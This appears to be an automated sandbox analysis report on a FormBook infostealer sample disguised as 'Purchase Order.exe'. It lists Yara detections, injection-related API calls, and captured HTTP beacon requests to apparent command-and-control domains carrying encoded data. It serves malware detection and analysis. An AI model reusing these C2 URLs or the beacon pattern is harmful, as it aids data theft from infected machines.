Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1Host: www.parkperge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1Host: www.parkperge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1Host: www.parkperge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1Host: www.parkperge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1Host: www.parkperge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1Host: www.parkperge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1Host: www.parkperge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1Host: www.parkperge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=Tj6/OTM6I6lPQKbNtdJzJUGicKglqWTTRjC8sj/IciFC7x3u/HDV/WpQbDvzl5/yISVikZxehTQ9OHQXfyLPtw2/9kJhoXLBccyt5t2M8CJt HTTP/1.1Host: www.parkperge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?u0Gp2vp8=hgu/VmoXDf6UNxe0oUcrLUetbm135fy9k2oFvNtbYeh4n6osOzYSt1ckvEFN+4fwt+77PX6U4+O9/Te6nTne3r1wHJXq9JP+reirnUB6JbLe&5jSp=DfjdjluHJP1L6t HTTP/1.1Host: www.paulmontecalvo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=4DW0Ix2ISCDXzyRIq6nLWpFg/kOd6MPQeoh+U0+q17Szsp1AtfvcjVsYAYVpuBtjTM9sWhorW0wi6/FtiSniUr4Ev2EWFbeUdNVgc9Noh4aH HTTP/1.1Host: www.lilustrlousdates.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?u0Gp2vp8=EAGH4IFhh6xE7YX+q6dzLzxowCGyCVWdEG2UGekGzSzRY3UgsSkbc9AFTcp0S8/1Y2oVSaiG2hU25Np27E35wcBaAhf/HofUYUzmWEnkiOgR&5jSp=DfjdjluHJP1L6t HTTP/1.1Host: www.montazeran.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=MNpom6rckKTYc/p1bd1msiE7/E65ho0u4Akvh+C3tvGatf13TKlIwaeKtMXL5ZEx/m2/gQUExMh3ECGJi31qDG5C0hkBNbhOEhSrDflhNah3 HTTP/1.1Host: www.khelojeetopro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?u0Gp2vp8=DcR1klBM4JBmZMLd6nvoC7lGrdIYWHbYnViGVkJW/JRBNZmMbg24lMYBXluvYDtmC8yqXkPgj1fAOXZkFouqzsLqhHeORSR6vsolbcc5pjEQ&5jSp=DfjdjluHJP1L6t HTTP/1.1Host: www.biggaming.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hcfu/?5jSp=DfjdjluHJP1L6t&u0Gp2vp8=BxtzAL4W5AO3uLI59q371KiLBxUzW2j+OYwN/F4Eg4C0p2x+AnoX0pyIV2L0uhGw1+4403oJ3BUP5BdGKU8IqK17GGLz449g8HGlF3Hp/yIQ HTTP/1.1Host: www.wewantabreak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: sphybwtjm.exe, 00000001.00000000.256790640.000000000082A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\Purchase Order.exe

Code function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004056DE

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.sphybwtjm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.350478611.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.347374827.0000000000401000.00000040.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.777484869.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.348319478.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.778050680.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.315415332.00000000103A6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.sphybwtjm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.sphybwtjm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.sphybwtjm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.350478611.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.350478611.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.350478611.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.347374827.0000000000401000.00000040.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.347374827.0000000000401000.00000040.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.347374827.0000000000401000.00000040.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.777484869.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.777484869.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.777484869.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.348319478.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.348319478.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.348319478.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.778050680.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.778050680.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.778050680.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.315415332.00000000103A6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000000.315415332.00000000103A6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.315415332.00000000103A6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: sphybwtjm.exe PID: 3760, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 5008, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Purchase Order.exe

Executable has a suspicious name (potential lure to open the executable)

Source: Purchase Order.exe

Static file information: Suspicious name

Source: Purchase Order.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 2.2.sphybwtjm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.sphybwtjm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.sphybwtjm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.350478611.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.350478611.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.350478611.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.772925851.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.347374827.0000000000401000.00000040.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.347374827.0000000000401000.00000040.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.347374827.0000000000401000.00000040.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.777484869.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.777484869.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.777484869.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.348319478.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.348319478.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.348319478.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.778050680.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.778050680.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.778050680.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.315415332.00000000103A6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000000.315415332.00000000103A6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.315415332.00000000103A6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: sphybwtjm.exe PID: 3760, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 5008, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 492

Source: C:\Users\user\Desktop\Purchase Order.exe

Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040352D

Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_0040755C	0_2_0040755C
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_00406D85	0_2_00406D85
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 1_2_00700227	1_2_00700227
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01611D55	2_2_01611D55
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0154F900	2_2_0154F900
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01612D07	2_2_01612D07
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01540D20	2_2_01540D20
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01564120	2_2_01564120
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0155D5E0	2_2_0155D5E0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01572581	2_2_01572581
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0155841F	2_2_0155841F
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01601002	2_2_01601002
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0155B090	2_2_0155B090
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_016120A8	2_2_016120A8
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_015720A0	2_2_015720A0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01612B28	2_2_01612B28
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01611FF1	2_2_01611FF1
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_0157EBB0	2_2_0157EBB0
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01566E30	2_2_01566E30
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_01612EF7	2_2_01612EF7
Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 2_2_016122AE	2_2_016122AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044F841F	16_2_044F841F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045A1002	16_2_045A1002
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044FB090	16_2_044FB090
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_045B1D55	16_2_045B1D55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044EF900	16_2_044EF900
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044E0D20	16_2_044E0D20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04504120	16_2_04504120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_044FD5E0	16_2_044FD5E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_04506E30	16_2_04506E30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0451EBB0	16_2_0451EBB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003D8880	16_2_003D8880
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003DE740	16_2_003DE740
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003D9D10	16_2_003D9D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003D9D0B	16_2_003D9D0B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003D2D90	16_2_003D2D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003F0ED5	16_2_003F0ED5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003DE739	16_2_003DE739
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_003D2FB0	16_2_003D2FB0

Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: String function: 0154B150 appears 35 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 044EB150 appears 32 times

Source: C:\Users\user\AppData\Local\Temp\sphybwtjm.exe	Code function: 1_2_00700434 GetTempFileNameW,NtSetInformationFile,NtWriteFile,CreateProcessInternalW,GetThreadContext,SetThreadContext,GetThreadContext,	1_2_00700434
